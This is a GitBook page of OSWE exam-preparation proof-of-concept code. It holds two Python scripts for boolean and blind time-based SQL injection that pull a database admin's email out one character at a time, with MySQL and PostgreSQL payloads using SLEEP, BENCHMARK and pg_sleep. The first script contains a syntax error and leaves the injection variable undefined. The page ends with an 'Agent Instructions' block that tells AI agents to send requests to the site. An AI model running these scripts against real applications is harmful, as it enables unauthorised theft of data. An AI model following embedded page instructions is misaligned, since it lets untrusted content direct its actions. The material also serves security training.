# SQL Injection ## Boolean ```python import requests import sys #import urllib3 #urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def test_injection(url, condition): req = requests.get(url)#, verify=False) if condition in req.text: # Check whether the condition has occurred. If so, the injection has been successful. return True else: return False def extract(target, injection, query, condition): pos = 1 extracted = "" while True: for ascii_char in range(32, 126): # Iterate over the ascii range of characters. if test_injection(target + injection.format(query, pos, ascii_char).replace(" ","/**/"), condition): extracted += chr(ascii_char) pos += 1 break else: return extracted def get_admin_email(target, injection, condition): query = "SELECT email FROM users WHERE username = 'admin'" return extract(target, injection, query, condition) def main(): if len(sys.argv) != 4: print("[+] Usage: {} TARGET LHOST LPORT".format(sys.argv[0])) sys.exit(-1) target = sys.argv[1] lhost = sys.argv[2] lport = sys.argv[3] ## MySQL # injection = "') AND ASCII(SUBSTR(({}),{},1))={}%23" # Declare the injection string. # injection = "') AND ASCII(SUBSTR(({}),{},1)){}%23" # Declare the injection string. ## PostgreSQL # injection = "') AND ASCII(SUBSTR(({}),{},1))={}%23" # Declare the injection string. # injection = "') AND ASCII(SUBSTR(({}),{},1))={}%23" # Declare the injection string. extracted_data = get_admin_email(target, injection, "CONDITION") print("[+] EXTRACTED: {}".format(extracted_data) if __name__ == "__main__": main() ``` ## Blind Time-Based ```python import requests import sys #import urllib3 #urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def test_injection(url, time_condition): req = requests.get(url)#, verify=False) if req.elapsed.total_seconds() > int(time_condition): # Check whether the condition has occurred. If so, the injection has been successful. return True else: return False def extract(target, injection, query, time_condition): pos = 1 extracted = "" while True: for ascii_char in range(32, 126): # Iterate over the ascii range of characters. if test_injection(target + injection.format(query, pos, ascii_char).replace(" ","/**/"), time_condition): extracted += chr(ascii_char) pos += 1 break else: return extracted def get_admin_email(target, injection, time_condition): query = "SELECT email FROM users WHERE username = 'admin'" return extract(target, injection, query, time_condition) def main(): if len(sys.argv) != 4: print("[+] Usage: {} TARGET LHOST LPORT".format(sys.argv[0])) sys.exit(-1) target = sys.argv[1] lhost = sys.argv[2] lport = sys.argv[3] ## MySQL # injection = "') AND ASCII(SUBSTR(({}),{},1))={} AND SLEEP(5)%23" # Declare the injection string. # injection = "') AND ASCII(SUBSTR(({}),{},1)){} AND BENCHMARK(3000000,SHA1(1337))%23" # Declare the injection string. # average 2-3 seconds ## PostgreSQL # injection = "') AND ASCII(SUBSTR(({}),{},1))={} AND (SELECT 1 FROM pg_sleep(10))=1%23" # Declare the injection string. # injection = "') AND ASCII(SUBSTR(({}),{},1))={} AND (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))=1%23" # Declare the injection string. extracted_data = get_admin_email(target, injection, NUMBER_OF_SECONDS_TO_DETECT) print("[+] EXTRACTED: {}".format(extracted_data)) if __name__ == "__main__": main() ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/sql-injection.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.